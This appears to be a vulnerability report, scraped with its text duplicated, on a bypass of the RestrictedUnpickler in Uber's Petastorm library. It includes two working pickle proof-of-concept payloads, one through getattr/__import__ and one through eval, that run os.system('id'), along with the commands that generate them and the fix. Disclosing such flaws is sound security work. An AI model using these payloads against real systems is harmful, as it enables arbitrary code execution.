Petastorm library enables single machine or distributed training and evaluation of deep learning models from datasets in Apache Parquet format. It supports ML frameworks such as Tensorflow, Pytorch, and PySpark and can be used from pure Python code.
and didn't check the name value at all, so we can still import some dangerous functions.
Now, I'll try to generate the pickle bytecode using my toy compiler. Exploits should execute code equivalent to __import__('os').system('id').
Let's take __builtin__ as an example:
[Exploit 0x01] We can combine builtins.__import__ and builtins.getattr to import arbitrary dangerous functions.
from petastorm.etl.legacy import restricted_loads
restricted_loads(b'\x80\x04\x95E\x00\x00\x00\x00\x00\x00\x00(\x8c\x08builtins\x8c\x07getattr\x93\x8c\x08builtins\x8c\n__import__\x93\x8c\x02os\x85R\x8c\x06system\x86R\x8c\x02id\x85R1N.')
Bytecode is generated by: python pickora.py -c '__import__("os").system("id")'.
[Exploit 0x2] We can just use builtins.eval or builtins.exec to execute arbitrary Python code
from petastorm.etl.legacy import restricted_loads
restricted_loads(b'\x80\x04\x956\x00\x00\x00\x00\x00\x00\x00(\x8c\x08builtins\x8c\x04eval\x93\x8c\x1d__import__("os").system("id")\x85R1N.')
Bytecode is generated by: python pickora.py -c "eval('__import__(\"os\").system(\"id\")')".
The Proper Way?
The correct way to restrict globals is restricting both module and name in find_class at the same time, just like what the documet do.
TL;DR
The implementation of
RestrictedUnpickler
in here is bypassable.https://github.com/uber/petastorm/blob/1071dbd1f0034b84e95af3a48782ab516bd3d07d/petastorm/etl/legacy.py#L34-L48
How to Bypass (PoC)
Basically, it just allows the following modules to import: https://github.com/uber/petastorm/blob/1071dbd1f0034b84e95af3a48782ab516bd3d07d/petastorm/etl/legacy.py#L22-L31
and didn't check the
name
value at all, so we can still import some dangerous functions.Now, I'll try to generate the pickle bytecode using my toy compiler. Exploits should execute code equivalent to
__import__('os').system('id')
.Let's take
__builtin__
as an example:[Exploit 0x01] We can combine
builtins.__import__
andbuiltins.getattr
to import arbitrary dangerous functions.Bytecode is generated by:
python pickora.py -c '__import__("os").system("id")'
.[Exploit 0x2] We can just use
builtins.eval
orbuiltins.exec
to execute arbitrary Python codeBytecode is generated by:
python pickora.py -c "eval('__import__(\"os\").system(\"id\")')"
.The Proper Way?
The correct way to restrict globals is restricting both
module
andname
infind_class
at the same time, just like what the documet do.